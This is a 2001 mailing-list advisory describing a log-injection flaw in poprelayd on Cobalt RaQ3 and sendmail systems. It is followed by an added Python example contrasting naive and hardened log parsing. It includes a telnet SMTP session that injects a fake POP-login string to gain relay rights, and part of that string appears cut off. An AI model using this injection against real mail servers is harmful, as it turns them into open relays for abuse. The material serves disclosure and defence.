From: Andrea Barisani (lcars@infis.univ.trieste.it)
Date: Tue Jul 03 2001 - 12:05:10 CDT


    Hi to all,

    Poprelayd is a simple script that scans /var/log/maillog for valid POP
    logins and updates a hash db used by sendmail to permit relaying for
    those valid POP users; this method is called "Pop-before-smtp".

    The syslog string searched by the script is in this form for the qpop
    /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)/

    On some cobalt raq3 servers (with the poprelayd add-on package installed)
    and in general on any system running the poprelayd script with sendmail it is
    possible to "inject" this string in the syslog using sendmail logging. So
    anyone can insert a fake string with his own IP which will be parsed by
    poprelayd and that will permit the use of sendmail as a relay.

    On cobalts the presence of poprelayd is revealed by the modified sendmail
    relaying denied message "Relaying denied. Please check your mail first."


    telnet dumbcobalt 25
    Connected to dumbcobalt
    ehlo dumbcobalt
    mail from:"POP login by user "admin" at (
    553 "POP login by user "admin" at (
    linux.org"...Domain name required

    now the IP can do relay :)

    in fact, on dumbcobalt:

    in /var/log/maillog

    ...reject=533 "POP login by user "admin" at (
    linux.org", size=0, class=0 ....etc etc...

    [root@dumbcobalt /]# /usr/sbin/poprelayd -p 7



    INFIS Network Administrator & Security Officer
    Department of Physics - University of Trieste
    lcars@infis.univ.trieste.it - PGP Key 0x8E21FE82
    "How would you know I'm mad?" said Alice.
    "You must be," said the Cat, "or you wouldn't have come here."
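The root cause described in the post is that the poprelayd pattern is searched anywhere in a maillog line, so text that sendmail logs verbatim from an SMTP envelope can satisfy it. The following is an added example (not code from the post or from poprelayd) contrasting that naive match with a parser that first splits the syslog line into its fields and only accepts the pattern when the program tag is the POP daemon; the syslog line layout, the daemon names in POP_PROGS and the sample log lines are assumptions constructed for the example.

```python
import re

# Pattern quoted in the post, applied to the whole line (the naive approach).
NAIVE_RE = re.compile(r'POP login by user "[\-_\w]+" at \(.+\) ([0-9\.]+)')

# Hardened approach (assumption): split the syslog line into timestamp, host,
# program tag and message first, then match the login pattern against the
# message alone and only when the tag names the POP daemon.
SYSLOG_RE = re.compile(
    r'^(?P<stamp>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) '
    r'(?P<prog>[A-Za-z0-9_.\-]+)(?:\[\d+\])?: (?P<msg>.*)$'
)
POP_PROGS = {"popper", "qpopper", "in.qpopper"}   # assumed daemon names
LOGIN_RE = re.compile(
    r'^POP login by user "([\-_\w]+)" at \(([^)]+)\) (\d{1,3}(?:\.\d{1,3}){3})$'
)


def naive_relay_ips(lines):
    """Collect the IP wherever the pattern occurs, as the post's script does."""
    ips = []
    for line in lines:
        m = NAIVE_RE.search(line)
        if m:
            ips.append(m.group(1))
    return ips


def hardened_relay_ips(lines):
    """Collect the IP only from login lines actually written by the POP daemon."""
    ips = []
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m or m.group("prog") not in POP_PROGS:
            continue   # e.g. a sendmail reject line echoing envelope text
        lm = LOGIN_RE.match(m.group("msg"))
        if lm:
            ips.append(lm.group(3))
    return ips


# Constructed sample lines: a genuine POP login, then a sendmail reject line
# that carries the same pattern inside the rejected envelope sender.
SAMPLE_LOG = [
    'Jul  3 12:01:02 dumbcobalt popper[812]: POP login by user "alice" '
    'at (pc1.example.net) 192.0.2.10',
    'Jul  3 12:05:10 dumbcobalt sendmail[901]: f63H5Ac00901: reject=553 '
    '"POP login by user "admin" at (linux.org) 203.0.113.7"... Domain name required',
]
```

The naive matcher returns both addresses, so 203.0.113.7 would be granted relay access; the hardened parser returns only 192.0.2.10.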